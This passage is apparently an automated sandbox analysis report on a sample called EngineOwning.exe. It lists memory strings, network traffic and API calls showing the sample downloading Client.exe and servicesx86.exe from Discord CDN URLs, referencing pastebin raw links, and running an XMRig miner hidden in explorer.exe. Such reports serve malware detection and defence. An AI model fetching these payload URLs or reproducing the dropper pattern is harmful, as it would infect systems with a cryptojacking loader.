      Source: powershell.exe, 0000000C.00000002.518394259.0000018437FCF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
      Source: powershell.exe, 0000000C.00000002.518394259.0000018437FCF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /attachments/935712720827842614/968101824034898000/servicesx86.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/935712720827842614/966833215883067412/Client.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
      Source: explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
      Source: explorer.exe, 00000028.00000002.702729290.0000000002E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.703290741.0000000002EEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701467589.0000000000AED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701574922.0000000000B08000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
      Source: explorer.exe, 00000028.00000002.701547821.0000000000AFF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl3
      Source: explorer.exe, 00000028.00000002.701547821.0000000000AFF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlh
      Source: EngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.514906018.000001844FE00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.530146916.000001844FE01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.703434212.000002A17CA99000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.635668478.00000199FEC0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000003.616993954.00000199FEC0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.702882171.0000022983000000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: svchost.exe, 0000000E.00000002.702957756.000002A17CA0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.702625959.00000229822EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: svchost.exe, 00000025.00000003.684955440.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.685202986.0000022983092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
      Source: powershell.exe, 0000000C.00000002.529630634.0000018447E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
      Source: explorer.exe, 00000028.00000002.702729290.0000000002E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.703290741.0000000002EEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701467589.0000000000AED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701547821.0000000000AFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701574922.0000000000B08000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
      Source: powershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 0000000C.00000002.518394259.0000018437FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: winrsdhost.exe, 00000004.00000002.564065301.000000000338E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.517135274.0000018437DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.618907768.00000199E6B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000000C.00000002.518394259.0000018437FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: EngineOwning.exe, 00000000.00000000.491825437.0000018A25537000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440409971.0000018A25537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
      Source: EngineOwning.exe, 00000000.00000000.491825437.0000018A25537000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440409971.0000018A25537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/R
      Source: EngineOwning.exe, 00000000.00000003.440424276.0000018A25549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exe
      Source: EngineOwning.exe, 00000000.00000000.489542532.0000018A254E9000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440520651.0000018A254E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeC:
      Source: EngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeLMEM
      Source: EngineOwning.exe, 00000000.00000000.491896440.0000018A25549000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440424276.0000018A25549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeQRM:
      Source: EngineOwning.exe, 00000000.00000000.489542532.0000018A254E9000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440520651.0000018A254E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeTTC:
      Source: EngineOwning.exe, 00000000.00000000.491896440.0000018A25549000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440424276.0000018A25549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeaR
      Source: EngineOwning.exe, 00000000.00000000.491896440.0000018A25549000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440424276.0000018A25549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeuRa:
      Source: EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exex
      Source: EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exe
      Source: EngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exe1
      Source: EngineOwning.exe, 00000000.00000000.493154695.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp, EngineOwning.exe, 00000000.00000000.429374377.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exeC:/Progr
      Source: EngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exeLMEM
      Source: EngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exei
      Source: powershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: svchost.exe, 00000025.00000003.684955440.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.685202986.0000022983092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
      Source: svchost.exe, 00000025.00000002.702402998.00000229822C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displaycatalog.mcros
      Source: powershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000020.00000002.635758290.00000199FEC7B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000003.617080076.00000199FEC7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
      Source: EngineOwning.exe, 00000000.00000000.491825437.0000018A25537000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440409971.0000018A25537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
      Source: powershell.exe, 0000000C.00000002.529630634.0000018447E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: explorer.exe, 00000028.00000002.701030193.0000000000AB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/1FrcGRG9
      Source: explorer.exe, 00000028.00000002.701030193.0000000000AB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/1FrcGRG9--cinit-stealth-targets=Taskmgr.exe
      Source: mdsigstub.exe, 00000007.00000002.533588737.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/gr9z66ws
      Source: svchost.exe, 00000025.00000003.679779414.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.681191680.0000022983092000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679699802.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679750355.00000229830B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679730659.00000229830A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
      Source: svchost.exe, 00000025.00000003.684955440.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.685202986.0000022983092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
      Source: svchost.exe, 00000025.00000003.684955440.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.685202986.0000022983092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
      Source: svchost.exe, 00000025.00000003.679779414.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.681191680.0000022983092000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679699802.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679750355.00000229830B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679730659.00000229830A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
      Source: svchost.exe, 00000025.00000003.679779414.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.681191680.0000022983092000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679699802.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679750355.00000229830B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679730659.00000229830A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
      Source: svchost.exe, 00000025.00000003.689083657.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.689013876.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.689063237.0000022983092000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.688988283.00000229830B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF61920 GetConsoleWindow,ShowWindow,URLDownloadToFileW,URLDownloadToFileW,SleepEx,system,system,_beginthreadex,SleepEx,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SleepEx,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SleepEx,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SleepEx,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SleepEx,terminate,?_Throw_Cpp_error@std@@YAXH@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
      Source: global trafficHTTP traffic detected: GET /attachments/935712720827842614/968101824034898000/servicesx86.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/935712720827842614/966833215883067412/Client.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: svchost.exe, 00000025.00000003.660162133.0000022983071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
      Source: svchost.exe, 00000025.00000003.660162133.0000022983071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
      Source: svchost.exe, 00000025.00000003.660162133.0000022983071000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.660255697.0000022983082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","M